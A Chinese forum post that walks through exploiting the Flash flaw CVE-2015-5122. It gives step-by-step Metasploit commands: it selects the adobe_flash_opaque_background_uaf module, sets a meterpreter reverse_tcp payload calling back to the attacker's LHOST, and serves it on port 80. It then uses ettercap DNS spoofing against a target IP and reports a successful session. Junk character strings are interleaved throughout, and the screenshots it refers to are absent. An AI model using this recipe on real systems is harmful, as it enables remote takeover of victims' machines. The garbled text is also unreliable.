cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

( m& Z7 w7 _$ l4 V# w( P 二、cve2015-5122漏洞实例演示虚拟机 7 ^2 S! { F2 o/ v! P

) v, W6 d8 b3 b. G5 m 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： * x" P' z P H1 V$ |

4 s- l" p O0 R3 L |0 C# j$ Z search cve-2015-5122如图： : J/ e* @/ p6 J- B" l0 |8 Z# w$ n

5 b, N0 W m% z7 M ~* Q8 d+ R1 A ; x; ~( ?+ Q, o- ~

, y( Y5 x' b, ]4 D+ Z 下面我们敲如下命令： 2 E* ]; G0 ~* `( a* P) K3 ^9 t

. s/ ` |2 I1 n" ] ] s, i use exploit/multi/browser/adobe_flash_opaque_background_uaf ; ]1 {+ _' w( d) t2 \; a* h5 `

' P B Q2 l4 a6 z# F set PAYLOAD windows/meterpreter/reverse_tcp ( X4 `. S2 L+ u) s! s$ D) C

. B$ Y, X" O s& u4 d' ] set LHOST 192.168.0.109 6 _/ k$ @4 |& G) @7 g- s

4 M8 B X/ p5 F- v" y$ M" e# u set URIPATH / /*根目录*/ : L( R% @1 o( j& ?% p

( L) s9 V3 s, A4 v set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 1 l' B' i D6 \3 N M O

0 p4 e& @! Z0 i) Y' R M% y6 z& d set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 # K0 z% i- k$ h% X4 q, Q

: w/ m' R, U. v- @ G1 l 然后show options如图： 0 W0 t( \: d/ j! l" F* ^

z" i K) y9 V) o( R6 l" w5 q: W: M $ x) i8 h, p$ ?, \6 ~5 d

, k& z4 k& N* S* ~, V* {8 d 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
2 W' m" D/ h/ _ S% @: h # ]' l; V; ?" U2 k+ x% x O

- `# Q' w0 R% M 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ! J: v* _+ a7 L$ [

5 ^! A! T3 t8 c% `8 O! S8 l Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 0 d7 c5 f" y3 Z

0 V! h0 n+ W! y% s" G % C# v% `- M9 Q) [

' U+ i1 ^3 K0 @# O; A3 L1 ]1 K 成功了，这时候我们断开ettercap，如图： $ Z, B, x3 x" H0 R2 o8 W- f3 r

1 r0 V( }+ k/ x; q0 V9 P2 N% t 6 d/ o: ~; w$ j4 f

) E- E, J7 S1 h5 m7 k Screenshot如图： 5 W$ ~9 j( A: e# o$ u3 C

9 I( h+ i" [- [) d2 ?8 t ! d d8 F7 W, t$ q$ y

2 u h6 u' [6 U! ?: N- o : [/ N6 P. g2 Z3 |1 _- }, x0 }

		自动登录	找回密码
密码			立即注册